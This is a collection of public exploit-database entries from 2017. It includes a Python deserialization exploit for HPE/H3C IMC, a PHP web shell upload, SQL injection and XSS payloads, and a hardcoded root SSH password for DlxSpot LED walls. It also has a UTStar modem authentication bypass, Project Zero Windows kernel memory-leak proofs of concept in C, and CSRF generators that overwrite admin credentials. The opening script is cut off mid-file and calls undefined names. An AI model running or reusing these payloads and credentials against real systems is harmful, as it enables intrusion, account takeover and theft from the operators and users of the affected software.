print ". 2. Send request to server"
print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print "."
print ". Example 2: -payload-string"
print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print "."
print "......................................................................................................................"
def loadPayloadFile (_fileName) :
print "[+] Load payload file %s" % _fileName
payloadFile = open(_fileName, 'rb')
payloadFile_read = payloadFile.read()
return payloadFile_read
def exploit (_payload) :
url = sys.argv[1]
url += "/imc/topo/WebDMServlet"
print "[+] Sending exploit to %s" % (url)
data = _payload
response = requests.post(url, data=data, verify=False)
return response
#def showResponse(_response):
# r = response
# m = r.search(_response)
# if (m.find("java.lang.NullPointerException")):
# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
# else:
# print "[-] ClassCastException not found, exploit failed"
if __name__ == "__main__":
if len(sys.argv) < 4:
printUsage()
sys.exit(0)
else:
print "------------------------------------------"
print "- HPE/H3C - IMC Java Deserialization Exploit -"
print "------------------------------------------"
host = sys.argv[1]
print "[*] Connecting to %s" %host
if sys.argv[2] == "-payload-binary":
payload_file = sys.argv[3]
if os.path.isfile(payload_file):
payload = loadPayloadFile(payload_file)
response = exploit(payload)
showResponse(response.content)
else:
print "[-] Can't load payload file"
elif sys.argv[2] == "-payload-string":
if os.path.isfile("ysoserial.jar"):
sPayload = sys.argv[3]
sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
print "[+] Create payload file (%s) " %sPayload
os.system(sPayload)
payload = loadPayloadFile(payload_file)
response = exploit(payload)
print "[+] Response received, exploit finished."
else:
print "[-] Can't load ysoserial.jar"
else:
printUsage()
# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12929
# Linked CVE's: CVE-2017-12928, CVE-2017-12930.
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Arbitrary File Upload leading to Remote Command Execution:
1. Visit http://host/resource.php and upload PHP shell. For example: <?php
system($_GET["c"]); ?>
2. RCE via http://host/resource/source/shell.php?c=id
3. Output: www-data
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: Foodspotting Clone v1.0 - SQL Injection/Reflected XSS
# Date: 2017-09-13
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/foodspotting-clone/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-13
Product & Service Introduction:
===============================
Foodspotting Clone allows you to initiate your very own social networking website that similar appearance as Foodspotting and additional food lover websites.
Technical Details & Description:
================================
Reflected XSS/SQL injection on [resid] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/restaurant-menu.php?resid=' AND SLEEP(5) AND 'nhSH'='nhSH
Parameter: resid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: resid=' AND SLEEP(5) AND 'nhSH'='nhSH
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: resid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x435a72445467737074496d6e5a7855726f6e534c4b6469705774427550576c70676d425361626642,0x71767a6271),NULL,NULL,NULL-- aIwp
Reflected XSS:
http://localhost/[path]/restaurant-menu.php?resid=/"><svg/onload=alert(/8bitsec/)>
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL
Injection
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12930
# Linked CVE's: CVE-2017-12928, CVE-2017-12929
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to full root access.
###############################################################################################################################
DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection
vulnerability in the admin interface login and is exploitable the following
way:
username:admin
password:x' or 'x'='x
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.
# CVE: CVE-2017-12928
# Linked CVE's: CVE-2017-12929, CVE-2017-12930
# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Hardcoded password for all dlxspot players, login with the following credentials via SSH
username: dlxuser
password: tecn0visi0n
Escalate to root with the same password.
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
2017-06-01 - No response, tried contacting again through several contact forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability
# CVE: CVE-2017-14243
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem
# Firmware version: WA3002G4-0021.01
# Vendor Homepage: http://www.utstar.com/
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
The CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source.
How to reproduce
===================
Suppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi – Status and details
* http://192.168.1.1/upload.cgi – Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – Router reset
* http://192.168.1.1/password.cgi – password settings
POC
=========
* https://www.youtube.com/watch?v=-wh1Y_jXMGk
-----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1268
We have discovered that the nt!NtGdiGetPhysicalMonitorDescription system call discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windows 10.
This is caused by the fact that the syscall copies a whole stack-based array of 256 bytes (128 wide-chars) to the caller, but typically only a small portion of the buffer is used to store the requested monitor description, while the rest of it remains uninitialized. This memory region contains sensitive information such as addresses of executable images, kernel stack, kernel pools and stack cookies.
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 47 00 65 00 6e 00 65 00 72 00 69 00 63 00 20 00 G.e.n.e.r.i.c. .
00000010: 4e 00 6f 00 6e 00 2d 00 50 00 6e 00 50 00 20 00 N.o.n.-.P.n.P. .
00000020: 4d 00 6f 00 6e 00 69 00 74 00 6f 00 72 00 00 00 M.o.n.i.t.o.r...
00000030: 74 00 6f 00 72 00 2e 00 64 00 65 00 76 00 69 00 t.o.r...d.e.v.i.
00000040: 63 00 65 00 64 00 65 00 73 00 63 00 25 00 3b 00 c.e.d.e.s.c.%.;.
00000050: 47 00 65 00 6e 00 65 00 72 00 69 00 63 00 20 00 G.e.n.e.r.i.c. .
00000060: 4e 00 6f 00 6e 00 2d 00 50 00 6e 00 50 00 20 00 N.o.n.-.P.n.P. .
00000070: 4d 00 6f 00 6e 00 69 00 74 00 6f 00 72 00 00 00 M.o.n.i.t.o.r...
00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
--- cut ---
If the stack spraying part of the PoC code is disabled, we can immediately observe various kernel-mode addresses in the dumped memory area.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <PhysicalMonitorEnumerationAPI.h>
#include <cstdio>
extern "C"
NTSTATUS WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
NTSTATUS(WINAPI *GetPhysicalMonitorDescription)(
_In_ HANDLE hMonitor,
_In_ DWORD dwPhysicalMonitorDescriptionSizeInChars,
_Out_ LPWSTR szPhysicalMonitorDescription
);
#define PHYSICAL_MONITOR_DESCRIPTION_SIZE 128
#define STATUS_SUCCESS 0
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PVOID ptr, BYTE byte, ULONG size) {
PBYTE _ptr = (PBYTE)ptr;
for (ULONG i = 0; i < size; i++) {
_ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static SIZE_T buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, ARRAYSIZE(buffer), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
WCHAR OutputBuffer[PHYSICAL_MONITOR_DESCRIPTION_SIZE];
HMODULE hGdi32 = LoadLibrary(L"gdi32.dll");
GetPhysicalMonitorDescription = (NTSTATUS(WINAPI *)(HANDLE, DWORD, LPWSTR))GetProcAddress(hGdi32, "GetPhysicalMonitorDescription");
// Create a window for referencing a monitor.
HWND hwnd = CreateWindowW(L"BUTTON", L"TestWindow", WS_OVERLAPPEDWINDOW | WS_VISIBLE,
CW_USEDEFAULT, CW_USEDEFAULT, 100, 100, NULL, NULL, 0, 0);
/////////////////////////////////////////////////////////////////////////////
// Source: https://msdn.microsoft.com/en-us/library/windows/desktop/dd692950(v=vs.85).aspx
/////////////////////////////////////////////////////////////////////////////
HMONITOR hMonitor = NULL;
DWORD cPhysicalMonitors;
LPPHYSICAL_MONITOR pPhysicalMonitors = NULL;
// Get the monitor handle.
hMonitor = MonitorFromWindow(hwnd, MONITOR_DEFAULTTOPRIMARY);
// Get the number of physical monitors.
BOOL bSuccess = GetNumberOfPhysicalMonitorsFromHMONITOR(hMonitor, &cPhysicalMonitors);
if (bSuccess) {
// Allocate the array of PHYSICAL_MONITOR structures.
pPhysicalMonitors = (LPPHYSICAL_MONITOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cPhysicalMonitors * sizeof(PHYSICAL_MONITOR));
if (pPhysicalMonitors != NULL) {
// Get the array.
bSuccess = GetPhysicalMonitorsFromHMONITOR(hMonitor, cPhysicalMonitors, pPhysicalMonitors);
if (bSuccess) {
for (DWORD i = 0; i < cPhysicalMonitors; i++) {
RtlZeroMemory(OutputBuffer, sizeof(OutputBuffer));
SprayKernelStack();
NTSTATUS st = GetPhysicalMonitorDescription(pPhysicalMonitors[i].hPhysicalMonitor, PHYSICAL_MONITOR_DESCRIPTION_SIZE, OutputBuffer);
if (st == STATUS_SUCCESS) {
PrintHex((PBYTE)OutputBuffer, sizeof(OutputBuffer));
} else {
printf("[-] GetPhysicalMonitorDescription failed, %x\n", st);
}
}
// Close the monitor handles.
bSuccess = DestroyPhysicalMonitors(cPhysicalMonitors, pPhysicalMonitors);
}
// Free the array.
HeapFree(GetProcessHeap(), 0, pPhysicalMonitors);
}
}
DestroyWindow(hwnd);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1269
We have discovered that the nt!NtRemoveIoCompletion system call handler discloses 4 bytes of uninitialized pool memory to user-mode clients on 64-bit platforms.
The bug manifests itself while passing the IO_STATUS_BLOCK structure back to user-mode. The structure is defined as follows:
--- cut ---
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
--- cut ---
On 64-bit Windows builds, the "Pointer" field is 64 bits in width while the "Status" field is 32-bits wide. This means that if only "Status" is initialized, the upper 32 bits of "Pointer" remain garbage. This is what happens in the nt!NtSetIoCompletion syscall, which allocates a completion packet with a nested IO_STATUS_BLOCK structure (from the pools or a lookaside list), and only sets the .Status field to a user-controlled 32-bit value, leaving the remaining part of the union untouched.
Furthermore, the nt!NtRemoveIoCompletion system call doesn't rewrite the structure to only pass the relevant data back to user-mode, but copies it in its entirety, thus disclosing the uninitialized 32 bits of memory to the ring-3 client. The attached proof-of-concept program illustrates the problem by triggering the vulnerability in a loop, and printing out the leaked value. When run on Windows 7 x64, we're seeing various upper 32-bit portions of kernel-mode pointers:
--- cut ---
Leak: FFFFF80011111111
Leak: FFFFF80011111111
Leak: FFFFF80011111111
Leak: FFFFF80011111111
...
Leak: FFFFF88011111111
Leak: FFFFF88011111111
Leak: FFFFF88011111111
Leak: FFFFF88011111111
...
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
--- cut ---
We suspect that the monotony in the nature of the disclosed value is caused by the usage of a lookaside list, and it could likely be overcome by depleting the list and forcing the kernel to fall back on regular pool allocations. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
The issue was discovered by James Forshaw of Google Project Zero.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")
extern "C" NTSTATUS __stdcall NtCreateIoCompletion(
PHANDLE IoCompletionHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
DWORD NumberOfConcurrentThreads
);
extern "C" NTSTATUS __stdcall NtRemoveIoCompletion(
HANDLE IoCompletionHandle,
PUINT_PTR KeyContext,
PUINT_PTR ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
PLARGE_INTEGER Timeout
);
extern "C" NTSTATUS __stdcall NtSetIoCompletion(
HANDLE IoCompletionHandle,
UINT_PTR KeyContext,
UINT_PTR ApcContext,
UINT_PTR Status,
UINT_PTR IoStatusInformation
);
int main()
{
HANDLE io_completion;
NTSTATUS status = NtCreateIoCompletion(&io_completion, MAXIMUM_ALLOWED, nullptr, 0);
if (!NT_SUCCESS(status))
{
printf("Error creation IO Completion: %08X\n", status);
return 1;
}
while (true)
{
status = NtSetIoCompletion(io_completion, 0x12345678, 0x9ABCDEF0, 0x11111111, 0x22222222);
if (!NT_SUCCESS(status))
{
printf("Error setting IO Completion: %08X\n", status);
return 1;
}
IO_STATUS_BLOCK io_status = {};
memset(&io_status, 'X', sizeof(io_status));
UINT_PTR key_ctx;
UINT_PTR apc_ctx;
status = NtRemoveIoCompletion(io_completion, &key_ctx, &apc_ctx, &io_status, nullptr);
if (!NT_SUCCESS(status))
{
printf("Error setting IO Completion: %08X\n", status);
return 1;
}
UINT_PTR p = (UINT_PTR)io_status.Pointer;
if ((p >> 32) != 0)
{
printf("Leak: %p\n", io_status.Pointer);
}
}
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1267&desc=2
We have discovered that the win32k!NtGdiGetGlyphOutline system call handler may disclose large portions of uninitialized pool memory to user-mode clients.
The function first allocates memory (using win32k!AllocFreeTmpBuffer) with a user-controlled size, then fills it with the outline data via win32k!GreGetGlyphOutlineInternal, and lastly copies the entire buffer back into user-mode address space. If the amount of data written by win32k!GreGetGlyphOutlineInternal is smaller than the size of the allocated memory region, the remaining part will stay uninitialized and will be copied in this form to the ring-3 client.
The bug can be triggered through the official GetGlyphOutline() API, which is a simple wrapper around the affected system call. The information disclosure is particularly severe because it allows the attacker to leak an arbitrary number of bytes from an arbitrarily-sized allocation, potentially enabling them to "collide" with certain interesting objects in memory.
Please note that the win32k!AllocFreeTmpBuffer routine works by first attempting to return a static block of 4096 bytes (win32k!gpTmpGlobalFree) for optimization, and only when it is already busy, a regular pool allocation is made. As a result, the attached PoC program will dump the contents of that memory region in most instances. However, if we enable the Special Pools mechanism for win32k.sys and start the program in a loop, we will occasionally see output similar to the following (for 64 leaked bytes). The repeated 0x67 byte in this case is the random marker inserted by Special Pools.
--- cut ---
00000000: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000010: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000020: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000030: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
--- cut ---
Interestingly, the bug is only present on Windows 7 and 8. On Windows 10, the following memset() call was added:
--- cut ---
.text:0018DD88 loc_18DD88: ; CODE XREF: NtGdiGetGlyphOutline(x,x,x,x,x,x,x,x)+5D
.text:0018DD88 push ebx ; size_t
.text:0018DD89 push 0 ; int
.text:0018DD8B push esi ; void *
.text:0018DD8C call _memset
--- cut ---
The above code pads the overall memory area with zeros, thus preventing any kind of information disclosure. This suggests that the issue was identified internally by Microsoft but only fixed in Windows 10 and not backported to earlier versions of the system.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
} else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
} else {
printf(".");
}
}
printf("\n");
}
}
int main(int argc, char **argv) {
if (argc < 2) {
printf("Usage: %s <number of bytes to leak>\n", argv[0]);
return 1;
}
UINT NumberOfLeakedBytes = strtoul(argv[1], NULL, 0);
// Create a Device Context.
HDC hdc = CreateCompatibleDC(NULL);
// Create a TrueType font.
HFONT hfont = CreateFont(1, // nHeight
1, // nWidth
0, // nEscapement
0, // nOrientation
FW_DONTCARE, // fnWeight
FALSE, // fdwItalic
FALSE, // fdwUnderline
FALSE, // fdwStrikeOut
ANSI_CHARSET, // fdwCharSet
OUT_DEFAULT_PRECIS, // fdwOutputPrecision
CLIP_DEFAULT_PRECIS, // fdwClipPrecision
DEFAULT_QUALITY, // fdwQuality
FF_DONTCARE, // fdwPitchAndFamily
L"Times New Roman");
// Select the font into the DC.
SelectObject(hdc, hfont);
// Get the glyph outline length.
GLYPHMETRICS gm;
MAT2 mat2 = { 0, 1, 0, 0, 0, 0, 0, 1 };
DWORD OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, 0, NULL, &mat2);
if (OutlineLength == GDI_ERROR) {
printf("[-] GetGlyphOutline#1 failed.\n");
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
// Allocate memory for the outline + leaked data.
PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, OutlineLength + NumberOfLeakedBytes);
// Fill the buffer with uninitialized pool memory from the kernel.
OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, OutlineLength + NumberOfLeakedBytes, OutputBuffer, &mat2);
if (OutlineLength == GDI_ERROR) {
printf("[-] GetGlyphOutline#2 failed.\n");
HeapFree(GetProcessHeap(), 0, OutputBuffer);
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
// Print the disclosed bytes on screen.
PrintHex(&OutputBuffer[OutlineLength], NumberOfLeakedBytes);
// Free resources.
HeapFree(GetProcessHeap(), 0, OutputBuffer);
DeleteObject(hfont);
DeleteDC(hdc);
return 0;
}
#!/usr/local/bin/python
# # # # #
# Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digileave.asp?id=1
# Demo: http://www.digiappz.com/digileave/login.asp
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
Digileave 1.2 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user">
<table border="0" align="center">
<tbody><tr>
<td valign="middle">
<table border="0" align="center">
<tbody><tr>
<td bgcolor="gray" align="center">
<table width="400" cellspacing="1" cellpadding="2" border="0">
<tbody><tr>
<td colspan="2" bgcolor="cream" align="left">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td>
<font><b>Choose Login*</b></font>
</td>
<td>
<input name="login" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Choose Password*</b></font>
</td>
<td>
<input name="password" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>First Name*</b></font>
</td>
<td>
<input name="first_name" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Last Name*</b></font>
</td>
<td>
<input name="last_name" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Email*</b></font>
</td>
<td>
<input name="email" size="30" value="admin@admin.com" onblur="emailvalid(this);" type="text">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input name="id" value="%s" type="hidden">
<input value="Update" onclick="return check()" type="submit">
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</form>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()
#!/usr/local/bin/python
# # # # #
# Exploit Title: DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digiaffiliate.asp?id=7
# Demo: http://www.digiappz.com/digiaffiliate/login.asp
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
DigiAffiliate 1.4 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digiaffiliate: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:220): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user">
<table border="0" align="center">
<tbody><tr>
<td valign="middle">
<table border="0" align="center">
<tbody><tr>
<td bgcolor="gray" align="center">
<table width="400" cellspacing="1" cellpadding="2" border="0">
<tbody><tr>
<td colspan="2" bgcolor="cream" align="left">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td>
<font><b>Choose Login*</b></font>
</td>
<td>
<input name="login" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Choose Password*</b></font>
</td>
<td>
<input name="password" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input name="id" value="%s" type="hidden">
<input value="Update" onclick="return check()" type="submit">
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</form>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()